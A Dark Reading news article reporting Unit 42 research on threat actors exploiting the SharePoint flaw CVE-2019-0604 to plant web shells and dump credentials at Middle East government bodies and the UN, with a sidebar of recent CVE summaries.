Dark Reading is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them.Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.

Cloud

2/4/2020
06:10 PM
Connect Directly
Twitter
LinkedIn
Google+
RSS
E-Mail
100%
0%

SharePoint Bug Proves Popular Weapon for Nation-State Attacks

Thousands of servers could be exposed to SharePoint vulnerability CVE-2019-0604, recently used in cyberattacks against Middle East government targets.

Researchers have detected multiple instances of cyberattackers using SharePoint vulnerability CVE-2019-0604 to target government organizations in the Middle East. These mark the latest cases of adversaries exploiting the flaw, which was recently used to breach the United Nations.

CVE-2019-0604 exists when SharePoint fails to check the source markup of an application package. Attackers could exploit this by uploading a specially crafted SharePoint application package to an affected version of the software. If successful, they could run arbitrary code in the context of both the SharePoint application pool and the SharePoint server farm account.

Microsoft released a patch for the vulnerability in February 2019 and later updated its fix in April. Shortly after, reports surfaced indicating the remote code execution flaw was under active attack. A series of incidents used the China Chopper web shell to gain entry into a target; evidence shows attackers used the web shell to gain network access at several organizations.

New findings from Palo Alto Networks' Unit 42 suggest the vulnerability is still popular among attackers. In September 2019, researchers detected unknown threat actors exploiting the flaw to install several web shells on the website of a Middle East government organization. One of these was AntSword, a web shell freely available on GitHub that resembles China Chopper.

Attackers used these web shells to move laterally across the network to access other systems, explains cyber threat intelligence analyst Robert Falcone in a blog post on the findings. They employed a custom Mimikatz variant to dump credentials from memory and Impacket's atexec tool to use dumped credentials to run commands on other systems throughout the network.

Later in September, Unit 42 saw this same Mimikatz variant uploaded to a web shell hosted at another government organization in a second Middle East country. This variant is unique, Falcone writes, as it has an allegedly custom loader application written in .NET. Because of this, researchers believe the same group is behind the breaches at both government organizations.

This isn't the first time Unit 42 has seen CVE-2019-0604 used against government targets in the Middle East. In April 2019, researchers saw the Emissary Panda threat group exploiting this flaw to install web shells on SharePoint servers at government organizations in two Middle Eastern countries, both different from the nations targeted in the January attacks. There are no strong ties linking the two attacks aside from a common vulnerability, similar tool set, and government victims.

Emissary Panda has "extensively used" strategic Web compromises to target victims, Falcone writes in an email to Dark Reading. However, there is not sufficient information to say with confidence where they operate. The group has been active since at least 2010 and targeted organizations in the government, aerospace, defense, technology, energy, and manufacturing verticals, in addition to other victims, with the goal of infiltrating and performing network reconnaissance to pivot to other systems.

"The exploitation of this vulnerability is not unique to Emissary Panda, as multiple threat groups are using this vulnerability to exploit SharePoint servers to gain initial access to targeted networks," Falcone writes. There is a possibility of overlap in the use of AntSword, as Emissary Panda used China Chopper and the two are "incredibly similar," he explains, but researchers don't currently believe the attackers behind the April 2019 attacks leveraged AntSword.

CVE-2019-0604 appeared in a recent attack against the United Nations during which intruders compromised servers at UN offices in Geneva and Vienna. Attackers accessed Active Directories, likely compromising human resources and network data. It's unclear exactly which files were stolen in the breach. One UN IT official estimates some 400GB of files were downloaded.

"Once the actors are in after successfully exploiting the vulnerability, they can do whatever they want within the constraints of the compromised network," says Falcone of the vulnerability's popularity, noting that a security tool might block or stop an attacker's actions. The flaw is commonly used because it's remotely exploitable pre-authentication, and there is publicly available code. "The public exploit code makes it easier for attackers, because they can just use a tool and gain access," he adds.

In early January 2020, Unit 42 researchers used Shodan to search for Internet-accessible servers running versions of SharePoint exposed to CVE-2019-0604. Their findings showed 28,881 servers advertised a vulnerable version of the software. They did not check each server to verify its exposure, so it's possible many public-facing servers are not exposed or have been patched.

"Regardless, the sheer number of servers and publicly available exploit code suggests that CVE-2019-0604 is still a major attack vector," Falcone writes.

Related Content:

Check out The Edge, Dark Reading's new section for features, threat data, and in-depth perspectives. Today's top story: "C-Level & Studying for the CISSP."

Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance & Technology, where she covered financial ... View Full Bio

Comment  | 
Print  | 
More Insights
Comments
Newest First  |  Oldest First  |  Threaded View
Cybersecurity Industry: It's Time to Stop the Victim Blame Game
Jessica Smith, Senior Vice President, The Crypsis Group,  2/25/2020
Google Adds More Security Features Via Chronicle Division
Robert Lemos, Contributing Writer,  2/25/2020
Register for Dark Reading Newsletters
White Papers
Video
Cartoon
Current Issue
6 Emerging Cyber Threats That Enterprises Face in 2020
This Tech Digest gives an in-depth look at six emerging cyber threats that enterprises could face in 2020. Download your copy today!
Flash Poll
How Enterprises Are Developing and Maintaining Secure Applications
How Enterprises Are Developing and Maintaining Secure Applications
The concept of application security is well known, but application security testing and remediation processes remain unbalanced. Most organizations are confident in their approach to AppSec, although others seem to have no approach at all. Read this report to find out more.
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
CVE-2020-9431
PUBLISHED: 2020-02-27
In Wireshark 3.2.0 to 3.2.1, 3.0.0 to 3.0.8, and 2.6.0 to 2.6.14, the LTE RRC dissector could leak memory. This was addressed in epan/dissectors/packet-lte-rrc.c by adjusting certain append operations.
CVE-2020-9432
PUBLISHED: 2020-02-27
openssl_x509_check_host in lua-openssl 0.7.7-1 mishandles X.509 certificate validation because it uses lua_pushboolean for certain non-boolean return values.
CVE-2020-9433
PUBLISHED: 2020-02-27
openssl_x509_check_email in lua-openssl 0.7.7-1 mishandles X.509 certificate validation because it uses lua_pushboolean for certain non-boolean return values.
CVE-2020-9434
PUBLISHED: 2020-02-27
openssl_x509_check_ip_asc in lua-openssl 0.7.7-1 mishandles X.509 certificate validation because it uses lua_pushboolean for certain non-boolean return values.
CVE-2020-6383
PUBLISHED: 2020-02-27
Type confusion in V8 in Google Chrome prior to 80.0.3987.116 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.